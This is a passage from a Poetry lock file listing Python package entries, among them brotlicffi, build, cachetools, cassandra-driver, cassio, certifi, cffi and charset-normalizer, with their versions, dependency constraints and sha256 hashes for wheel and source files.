hash = "sha256:ca72968ae4eaf6470498d5c2887073f7efe3b1e7d7ec8be11a06a79cc810e990"}, {file = "brotlicffi-1.1.0.0-pp37-pypy37_pp73-win_amd64.whl", hash = "sha256:add0de5b9ad9e9aa293c3aa4e9deb2b61e99ad6c1634e01d01d98c03e6a354cc"}, {file = "brotlicffi-1.1.0.0-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:9b6068e0f3769992d6b622a1cd2e7835eae3cf8d9da123d7f51ca9c1e9c333e5"}, {file = "brotlicffi-1.1.0.0-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8557a8559509b61e65083f8782329188a250102372576093c88930c875a69838"}, {file = "brotlicffi-1.1.0.0-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2a7ae37e5d79c5bdfb5b4b99f2715a6035e6c5bf538c3746abc8e26694f92f33"}, {file = "brotlicffi-1.1.0.0-pp38-pypy38_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:391151ec86bb1c683835980f4816272a87eaddc46bb91cbf44f62228b84d8cca"}, {file = "brotlicffi-1.1.0.0-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:2f3711be9290f0453de8eed5275d93d286abe26b08ab4a35d7452caa1fef532f"}, {file = "brotlicffi-1.1.0.0-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:1a807d760763e398bbf2c6394ae9da5815901aa93ee0a37bca5efe78d4ee3171"}, {file = "brotlicffi-1.1.0.0-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fa8ca0623b26c94fccc3a1fdd895be1743b838f3917300506d04aa3346fd2a14"}, {file = "brotlicffi-1.1.0.0-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3de0cf28a53a3238b252aca9fed1593e9d36c1d116748013339f0949bfc84112"}, {file = "brotlicffi-1.1.0.0-pp39-pypy39_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6be5ec0e88a4925c91f3dea2bb0013b3a2accda6f77238f76a34a1ea532a1cb0"}, {file = "brotlicffi-1.1.0.0-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:d9eb71bb1085d996244439154387266fd23d6ad37161f6f52f1cd41dd95a3808"}, {file = "brotlicffi-1.1.0.0.tar.gz", hash = "sha256:b77827a689905143f87915310b93b273ab17888fd43ef350d4832c4a71083c13"}, ] [package.dependencies] cffi = ">=1.0.0" [[package]] name = "build" version = "1.0.3" description = "A simple, correct Python build frontend" optional = true python-versions = ">= 3.7" files = [ {file = "build-1.0.3-py3-none-any.whl", hash = "sha256:589bf99a67df7c9cf07ec0ac0e5e2ea5d4b37ac63301c4986d1acb126aa83f8f"}, {file = "build-1.0.3.tar.gz", hash = "sha256:538aab1b64f9828977f84bc63ae570b060a8ed1be419e7870b8b4fc5e6ea553b"}, ] [package.dependencies] colorama = {version = "*", markers = "os_name == \"nt\""} importlib-metadata = {version = ">=4.6", markers = "python_version < \"3.10\""} packaging = ">=19.0" pyproject_hooks = "*" tomli = {version = ">=1.1.0", markers = "python_version < \"3.11\""} [package.extras] docs = ["furo (>=2023.08.17)", "sphinx (>=7.0,<8.0)", "sphinx-argparse-cli (>=1.5)", "sphinx-autodoc-typehints (>=1.10)", "sphinx-issues (>=3.0.0)"] test = ["filelock (>=3)", "pytest (>=6.2.4)", "pytest-cov (>=2.12)", "pytest-mock (>=2)", "pytest-rerunfailures (>=9.1)", "pytest-xdist (>=1.34)", "setuptools (>=42.0.0)", "setuptools (>=56.0.0)", "setuptools (>=56.0.0)", "setuptools (>=67.8.0)", "wheel (>=0.36.0)"] typing = ["importlib-metadata (>=5.1)", "mypy (>=1.5.0,<1.6.0)", "tomli", "typing-extensions (>=3.7.4.3)"] virtualenv = ["virtualenv (>=20.0.35)"] [[package]] name = "cachetools" version = "5.3.2" description = "Extensible memoizing collections and decorators" optional = true python-versions = ">=3.7" files = [ {file = "cachetools-5.3.2-py3-none-any.whl", hash = "sha256:861f35a13a451f94e301ce2bec7cac63e881232ccce7ed67fab9b5df4d3beaa1"}, {file = "cachetools-5.3.2.tar.gz", hash = "sha256:086ee420196f7b2ab9ca2db2520aca326318b68fe5ba8bc4d49cca91add450f2"}, ] [[package]] name = "cassandra-driver" version = "3.28.0" description = "DataStax Driver for Apache Cassandra" optional = false python-versions = "*" files = [ {file = "cassandra-driver-3.28.0.tar.gz", hash = "sha256:64ff130d19f994b80997c14343a8306be52a0e7ab92520a534eed944c88d70df"}, {file = "cassandra_driver-3.28.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:a8cceb2cc658b3ebf28873f84aab4f28bbd5df23a6528a5b38ecf89a45232509"}, {file = "cassandra_driver-3.28.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:35aef74e2a593a969b77a3fcf02d27e9b82a078d9aa66caa3bd2d2583c46a82c"}, {file = "cassandra_driver-3.28.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:48f20e0d21b6c7406dfd8a4d9e07fddc3c7c3d6ad7d5b5d480bf82aac7068739"}, {file = "cassandra_driver-3.28.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3820a421fb7e4cf215718dc35522869c5f933d4fd4c50fd43307d3ce5d9dd138"}, {file = "cassandra_driver-3.28.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0dd9511fe5b85010e92199f6589e0733ab14ed3d2279dcc6ae504c0cef11d652"}, {file = "cassandra_driver-3.28.0-cp310-cp310-win32.whl", hash = "sha256:887f7e3df9b34b41de6dfdd5f2ef8804c2d9782bbc39202eda9d3b67a3c8fe37"}, {file = "cassandra_driver-3.28.0-cp310-cp310-win_amd64.whl", hash = "sha256:28c636239b15944103df18a12ef95e6401ceadd7b9aca2d59f4beccf9ca21e2d"}, {file = "cassandra_driver-3.28.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:9232434459303b0e1a26fa65006fd8438475037aef4e6204a32dfaeb10e7f739"}, {file = "cassandra_driver-3.28.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:634a553a5309a9faa08c3256fe0237ff0308152210211f3b8eab0664335560e0"}, {file = "cassandra_driver-3.28.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:4a101114a7d93505ee79272edc82dba0cfc706172ad7948a6e4fb3dc1eb8b59c"}, {file = "cassandra_driver-3.28.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:36d844ba0089111858fad3c53897b0fea7c91cedd8bd205eeb82fe22fd60e748"}, {file = "cassandra_driver-3.28.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c3bf6bacb60dc8d1b8ba5ddd7d35772e3b98da951aed6bb148827aa9c38cd009"}, {file = "cassandra_driver-3.28.0-cp311-cp311-win32.whl", hash = "sha256:212eb39ca99ab5960eb5c31ce279b61e075df02ac7a6209415982a3f8cfe1126"}, {file = "cassandra_driver-3.28.0-cp311-cp311-win_amd64.whl", hash = "sha256:777f60ed821ec43d5b3f7a65eaf02decbd9cbc11e32f2099bfe9d7a6bfe33da9"}, {file = "cassandra_driver-3.28.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:b867c49c3c9efa21923845456cfb3e81ad13a33e40eb20279f58b3642d54614f"}, {file = "cassandra_driver-3.28.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f1dc54edf3b664dc8e45a9c8fed163dacbad8bc92c788c84a371ccb700e18638"}, {file = "cassandra_driver-3.28.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e383aff200b7194d0d5625bf162bbc8471d05db7163c546341e5f27b36b53134"}, {file = "cassandra_driver-3.28.0-cp37-cp37m-win32.whl", hash = "sha256:a5e8b066f816868b344c108f34acc04b53c44caed2cdbcfe08ebdcbc1fd35046"}, {file = "cassandra_driver-3.28.0-cp37-cp37m-win_amd64.whl", hash = "sha256:ae8c8e9a46e1b0174ace1e836d4ea97292aa6de509db0def0f816322468fb430"}, {file = "cassandra_driver-3.28.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:d5e8cf7db955b113f51274f166be9db0f0a06620c894abc41159828f0aeda259"}, {file = "cassandra_driver-3.28.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:26cbdb0d04f749b78bf7de17fd6a713b90430d1c70d8aa442845d51db823b9eb"}, {file = "cassandra_driver-3.28.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:fe302940780932d83414ad5282c8a6bd72b248f3b1fceff995f28c77a6ebc925"}, {file = "cassandra_driver-3.28.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3694c1e19d310668f5a60c16511fb12c3ad4c387d089a8080b74239a916620fb"}, {file = "cassandra_driver-3.28.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9f5690b7b121e82c4365d298bd49dc574ecd8eed3ec0bafdf43fce708f2f992b"}, {file = "cassandra_driver-3.28.0-cp38-cp38-win32.whl", hash = "sha256:d09c8b0b392064054656050448dece04e4fa890af3c677a2f2034af14983ceb5"}, {file = "cassandra_driver-3.28.0-cp38-cp38-win_amd64.whl", hash = "sha256:e2342420bae4f80587e2ddebb38ade448c9ab1d210787a8030c1c04f54ef4a84"}, {file = "cassandra_driver-3.28.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:c8d934cb7eac6586823a7eb69d40019154fd8e7d640bfaed49ac7edc373578df"}, {file = "cassandra_driver-3.28.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:8b51805d57ff6ed73a95c83c25d0479391da28c765c2bf019ee1370d8ca64cd0"}, {file = "cassandra_driver-3.28.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:5f05495ccabe5be046bb9f1c2cc3e3ff696a94fd4f2f2b1004c951e56b1ea38d"}, {file = "cassandra_driver-3.28.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:59050666423c4ffdda9626676c18cce83a71c8331dd3d99f6b9306e0941348cf"}, {file = "cassandra_driver-3.28.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a665841c15f2fade6b00a8404d3424fed8757971b75e791b69bfedacc4753f7c"}, {file = "cassandra_driver-3.28.0-cp39-cp39-win32.whl", hash = "sha256:46433de332b8ef59ad44140f287b584303b90111cf6f355ec8c990830135dd21"}, {file = "cassandra_driver-3.28.0-cp39-cp39-win_amd64.whl", hash = "sha256:5e6213f10d58b05a6120bcff4f479d89c152d3f4ba43b3bda3283ee67c3abe23"}, ] [package.dependencies] geomet = ">=0.1,<0.3" six = ">=1.9" [package.extras] cle = ["cryptography (>=35.0)"] graph = ["gremlinpython (==3.4.6)"] [[package]] name = "cassio" version = "0.1.3" description = "A framework-agnostic Python library to seamlessly integrate Apache Cassandra(R) with ML/LLM/genAI workloads." optional = false python-versions = ">=3.8" files = [ {file = "cassio-0.1.3-py3-none-any.whl", hash = "sha256:2ced5b7e5c6e58b7b4647388d8629c77fdb9a8d745f8763e7e87d1da924ff0f1"}, {file = "cassio-0.1.3.tar.gz", hash = "sha256:dbea30c1aa3014205fd48e036d2bcc8ba949e8b3f3351ca9cef698665cb40a18"}, ] [package.dependencies] cassandra-driver = ">=3.28.0" numpy = ">=1.0" requests = ">=2" [[package]] name = "certifi" version = "2023.7.22" description = "Python package for providing Mozilla's CA Bundle." optional = false python-versions = ">=3.6" files = [ {file = "certifi-2023.7.22-py3-none-any.whl", hash = "sha256:92d6037539857d8206b8f6ae472e8b77db8058fec5937a1ef3f54304089edbb9"}, {file = "certifi-2023.7.22.tar.gz", hash = "sha256:539cc1d13202e33ca466e88b2807e29f4c13049d6d87031a3c110744495cb082"}, ] [[package]] name = "cffi" version = "1.16.0" description = "Foreign Function Interface for Python calling C code." optional = false python-versions = ">=3.8" files = [ {file = "cffi-1.16.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:6b3d6606d369fc1da4fd8c357d026317fbb9c9b75d36dc16e90e84c26854b088"}, {file = "cffi-1.16.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:ac0f5edd2360eea2f1daa9e26a41db02dd4b0451b48f7c318e217ee092a213e9"}, {file = "cffi-1.16.0-cp310-cp310-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7e61e3e4fa664a8588aa25c883eab612a188c725755afff6289454d6362b9673"}, {file = "cffi-1.16.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a72e8961a86d19bdb45851d8f1f08b041ea37d2bd8d4fd19903bc3083d80c896"}, {file = "cffi-1.16.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:5b50bf3f55561dac5438f8e70bfcdfd74543fd60df5fa5f62d94e5867deca684"}, {file = "cffi-1.16.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:7651c50c8c5ef7bdb41108b7b8c5a83013bfaa8a935590c5d74627c047a583c7"}, {file = "cffi-1.16.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e4108df7fe9b707191e55f33efbcb2d81928e10cea45527879a4749cbe472614"}, {file = "cffi-1.16.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:32c68ef735dbe5857c810328cb2481e24722a59a2003018885514d4c09af9743"}, {file = "cffi-1.16.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:673739cb539f8cdaa07d92d02efa93c9ccf87e345b9a0b556e3ecc666718468d"}, {file = "cffi-1.16.0-cp310-cp310-win32.whl", hash = "sha256:9f90389693731ff1f659e55c7d1640e2ec43ff725cc61b04b2f9c6d8d017df6a"}, {file = "cffi-1.16.0-cp310-cp310-win_amd64.whl", hash = "sha256:e6024675e67af929088fda399b2094574609396b1decb609c55fa58b028a32a1"}, {file = "cffi-1.16.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:b84834d0cf97e7d27dd5b7f3aca7b6e9263c56308ab9dc8aae9784abb774d404"}, {file = "cffi-1.16.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:1b8ebc27c014c59692bb2664c7d13ce7a6e9a629be20e54e7271fa696ff2b417"}, {file = "cffi-1.16.0-cp311-cp311-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ee07e47c12890ef248766a6e55bd38ebfb2bb8edd4142d56db91b21ea68b7627"}, {file = "cffi-1.16.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d8a9d3ebe49f084ad71f9269834ceccbf398253c9fac910c4fd7053ff1386936"}, {file = "cffi-1.16.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:e70f54f1796669ef691ca07d046cd81a29cb4deb1e5f942003f401c0c4a2695d"}, {file = "cffi-1.16.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:5bf44d66cdf9e893637896c7faa22298baebcd18d1ddb6d2626a6e39793a1d56"}, {file = "cffi-1.16.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7b78010e7b97fef4bee1e896df8a4bbb6712b7f05b7ef630f9d1da00f6444d2e"}, {file = "cffi-1.16.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:c6a164aa47843fb1b01e941d385aab7215563bb8816d80ff3a363a9f8448a8dc"}, {file = "cffi-1.16.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:e09f3ff613345df5e8c3667da1d918f9149bd623cd9070c983c013792a9a62eb"}, {file = "cffi-1.16.0-cp311-cp311-win32.whl", hash = "sha256:2c56b361916f390cd758a57f2e16233eb4f64bcbeee88a4881ea90fca14dc6ab"}, {file = "cffi-1.16.0-cp311-cp311-win_amd64.whl", hash = "sha256:db8e577c19c0fda0beb7e0d4e09e0ba74b1e4c092e0e40bfa12fe05b6f6d75ba"}, {file = "cffi-1.16.0-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:fa3a0128b152627161ce47201262d3140edb5a5c3da88d73a1b790a959126956"}, {file = "cffi-1.16.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:68e7c44931cc171c54ccb702482e9fc723192e88d25a0e133edd7aff8fcd1f6e"}, {file = "cffi-1.16.0-cp312-cp312-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:abd808f9c129ba2beda4cfc53bde801e5bcf9d6e0f22f095e45327c038bfe68e"}, {file = "cffi-1.16.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:88e2b3c14bdb32e440be531ade29d3c50a1a59cd4e51b1dd8b0865c54ea5d2e2"}, {file = "cffi-1.16.0-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:fcc8eb6d5902bb1cf6dc4f187ee3ea80a1eba0a89aba40a5cb20a5087d961357"}, {file = "cffi-1.16.0-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:b7be2d771cdba2942e13215c4e340bfd76398e9227ad10402a8767ab1865d2e6"}, {file = "cffi-1.16.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e715596e683d2ce000574bae5d07bd522c781a822866c20495e52520564f0969"}, {file = "cffi-1.16.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:2d92b25dbf6cae33f65005baf472d2c245c050b1ce709cc4588cdcdd5495b520"}, {file = "cffi-1.16.0-cp312-cp312-win32.whl", hash = "sha256:b2ca4e77f9f47c55c194982e10f058db063937845bb2b7a86c84a6cfe0aefa8b"}, {file = "cffi-1.16.0-cp312-cp312-win_amd64.whl", hash = "sha256:68678abf380b42ce21a5f2abde8efee05c114c2fdb2e9eef2efdb0257fba1235"}, {file = "cffi-1.16.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:0c9ef6ff37e974b73c25eecc13952c55bceed9112be2d9d938ded8e856138bcc"}, {file = "cffi-1.16.0-cp38-cp38-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:a09582f178759ee8128d9270cd1344154fd473bb77d94ce0aeb2a93ebf0feaf0"}, {file = "cffi-1.16.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e760191dd42581e023a68b758769e2da259b5d52e3103c6060ddc02c9edb8d7b"}, {file = "cffi-1.16.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:80876338e19c951fdfed6198e70bc88f1c9758b94578d5a7c4c91a87af3cf31c"}, {file = "cffi-1.16.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:a6a14b17d7e17fa0d207ac08642c8820f84f25ce17a442fd15e27ea18d67c59b"}, {file = "cffi-1.16.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6602bc8dc6f3a9e02b6c22c4fc1e47aa50f8f8e6d3f78a5e16ac33ef5fefa324"}, {file = "cffi-1.16.0-cp38-cp38-win32.whl", hash = "sha256:131fd094d1065b19540c3d72594260f118b231090295d8c34e19a7bbcf2e860a"}, {file = "cffi-1.16.0-cp38-cp38-win_amd64.whl", hash = "sha256:31d13b0f99e0836b7ff893d37af07366ebc90b678b6664c955b54561fc36ef36"}, {file = "cffi-1.16.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:582215a0e9adbe0e379761260553ba11c58943e4bbe9c36430c4ca6ac74b15ed"}, {file = "cffi-1.16.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:b29ebffcf550f9da55bec9e02ad430c992a87e5f512cd63388abb76f1036d8d2"}, {file = "cffi-1.16.0-cp39-cp39-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:dc9b18bf40cc75f66f40a7379f6a9513244fe33c0e8aa72e2d56b0196a7ef872"}, {file = "cffi-1.16.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9cb4a35b3642fc5c005a6755a5d17c6c8b6bcb6981baf81cea8bfbc8903e8ba8"}, {file = "cffi-1.16.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b86851a328eedc692acf81fb05444bdf1891747c25af7529e39ddafaf68a4f3f"}, {file = "cffi-1.16.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c0f31130ebc2d37cdd8e44605fb5fa7ad59049298b3f745c74fa74c62fbfcfc4"}, {file = "cffi-1.16.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8f8e709127c6c77446a8c0a8c8bf3c8ee706a06cd44b1e827c3e6a2ee6b8c098"}, {file = "cffi-1.16.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:748dcd1e3d3d7cd5443ef03ce8685043294ad6bd7c02a38d1bd367cfd968e000"}, {file = "cffi-1.16.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:8895613bcc094d4a1b2dbe179d88d7fb4a15cee43c052e8885783fac397d91fe"}, {file = "cffi-1.16.0-cp39-cp39-win32.whl", hash = "sha256:ed86a35631f7bfbb28e108dd96773b9d5a6ce4811cf6ea468bb6a359b256b1e4"}, {file = "cffi-1.16.0-cp39-cp39-win_amd64.whl", hash = "sha256:3686dffb02459559c74dd3d81748269ffb0eb027c39a6fc99502de37d501faa8"}, {file = "cffi-1.16.0.tar.gz", hash = "sha256:bcb3ef43e58665bbda2fb198698fcae6776483e0c4a631aa5647806c25e02cc0"}, ] [package.dependencies] pycparser = "*" [[package]] name = "chardet" version = "5.2.0" description = "Universal encoding detector for Python 3" optional = true python-versions = ">=3.7" files = [ {file = "chardet-5.2.0-py3-none-any.whl", hash = "sha256:e1cf59446890a00105fe7b7912492ea04b6e6f06d4b742b2c788469e34c82970"}, {file = "chardet-5.2.0.tar.gz", hash = "sha256:1b3b6ff479a8c414bc3fa2c0852995695c4a026dcd6d0633b2dd092ca39c1cf7"}, ] [[package]] name = "charset-normalizer" version = "3.3.1" description = "The Real First Universal Charset Detector. Open, modern and actively maintained alternative to Chardet." optional = false python-versions = ">=3.7.0" files = [ {file = "charset-normalizer-3.3.1.tar.gz", hash = "sha256:d9137a876020661972ca6eec0766d81aef8a5627df628b664b234b73396e727e"}, {file = "charset_normalizer-3.3.1-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:8aee051c89e13565c6bd366813c386939f8e928af93c29fda4af86d25b73d8f8"}, {file = "charset_normalizer-3.3.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:352a88c3df0d1fa886562384b86f9a9e27563d4704ee0e9d56ec6fcd270ea690"}, {file = "charset_normalizer-3.3.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:223b4d54561c01048f657fa6ce41461d5ad8ff128b9678cfe8b2ecd951e3f8a2"}, {file = "charset_normalizer-3.3.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4f861d94c2a450b974b86093c6c027888627b8082f1299dfd5a4bae8e2292821"}, {file = "charset_normalizer-3.3.1-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1171ef1fc5ab4693c5d151ae0fdad7f7349920eabbaca6271f95969fa0756c2d"}, {file = "charset_normalizer-3.3.1-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:28f512b9a33235545fbbdac6a330a510b63be278a50071a336afc1b78781b147"}, {file = "charset_normalizer-3.3.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c0e842112fe3f1a4ffcf64b06dc4c61a88441c2f02f373367f7b4c1aa9be2ad5"}, {file = "charset_normalizer-3.3.1-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:3f9bc2ce123637a60ebe819f9fccc614da1bcc05798bbbaf2dd4ec91f3e08846"}, {file = "charset_normalizer-3.3.1-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:f194cce575e59ffe442c10a360182a986535fd90b57f7debfaa5c845c409ecc3"}, {file = "charset_normalizer-3.3.1-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:9a74041ba0bfa9bc9b9bb2cd3238a6ab3b7618e759b41bd15b5f6ad958d17605"}, {file = "charset_normalizer-3.3.1-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:b578cbe580e3b41ad17b1c428f382c814b32a6ce90f2d8e39e2e635d49e498d1"}, {file = "charset_normalizer-3.3.1-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:6db3cfb9b4fcecb4390db154e75b49578c87a3b9979b40cdf90d7e4b945656e1"}, {file = "charset_normalizer-3.3.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:debb633f3f7856f95ad957d9b9c781f8e2c6303ef21724ec94bea2ce2fcbd056"}, {file = "charset_normalizer-3.3.1-cp310-cp310-win32.whl", hash = "sha256:87071618d3d8ec8b186d53cb6e66955ef2a0e4fa63ccd3709c0c90ac5a43520f"}, {file = "charset_normalizer-3.3.1-cp310-cp310-win_amd64.whl", hash = "sha256:e372d7dfd154009142631de2d316adad3cc1c36c32a38b16a4751ba78da2a397"}, {file = "charset_normalizer-3.3.1-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:ae4070f741f8d809075ef697877fd350ecf0b7c5837ed68738607ee0a2c572cf"}, {file = "charset_normalizer-3.3.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:58e875eb7016fd014c0eea46c6fa92b87b62c0cb31b9feae25cbbe62c919f54d"}, {file = "charset_normalizer-3.3.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:dbd95e300367aa0827496fe75a1766d198d34385a58f97683fe6e07f89ca3e3c"}, {file = "charset_normalizer-3.3.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:de0b4caa1c8a21394e8ce971997614a17648f94e1cd0640fbd6b4d14cab13a72"}, {file = "charset_normalizer-3.3.1-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:985c7965f62f6f32bf432e2681173db41336a9c2611693247069288bcb0c7f8b"}, {file = "charset_normalizer-3.3.1-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:a15c1fe6d26e83fd2e5972425a772cca158eae58b05d4a25a4e474c221053e2d"}, {file = "charset_normalizer-3.3.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ae55d592b02c4349525b6ed8f74c692509e5adffa842e582c0f861751701a673"}, {file = "charset_normalizer-3.3.1-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:be4d9c2770044a59715eb57c1144dedea7c5d5ae80c68fb9959515037cde2008"}, {file = "charset_normalizer-3.3.1-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:851cf693fb3aaef71031237cd68699dded198657ec1e76a76eb8be58c03a5d1f"}, {file = "charset_normalizer-3.3.1-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:31bbaba7218904d2eabecf4feec0d07469284e952a27400f23b6628439439fa7"}, {file = "charset_normalizer-3.3.1-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:871d045d6ccc181fd863a3cd66ee8e395523ebfbc57f85f91f035f50cee8e3d4"}, {file = "charset_normalizer-3.3.1-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:501adc5eb6cd5f40a6f77fbd90e5ab915c8fd6e8c614af2db5561e16c600d6f3"}, {file = "charset_normalizer-3.3.1-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:f5fb672c396d826ca16a022ac04c9dce74e00a1c344f6ad1a0fdc1ba1f332213"}, {file = "charset_normalizer-3.3.1-cp311-cp311-win32.whl", hash = "sha256:bb06098d019766ca16fc915ecaa455c1f1cd594204e7f840cd6258237b5079a8"}, {file = "charset_normalizer-3.3.1-cp311-cp311-win_amd64.whl", hash = "sha256:8af5a8917b8af42295e86b64903156b4f110a30dca5f3b5aedea123fbd638bff"}, {file = "charset_normalizer-3.3.1-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:7ae8e5142dcc7a49168f4055255dbcced01dc1714a90a21f87448dc8d90617d1"}, {file = "charset_normalizer-3.3.1-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:5b70bab78accbc672f50e878a5b73ca692f45f5b5e25c8066d748c09405e6a55"}, {file = "charset_normalizer-3.3.1-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:5ceca5876032362ae73b83347be8b5dbd2d1faf3358deb38c9c88776779b2e2f"}, {file = 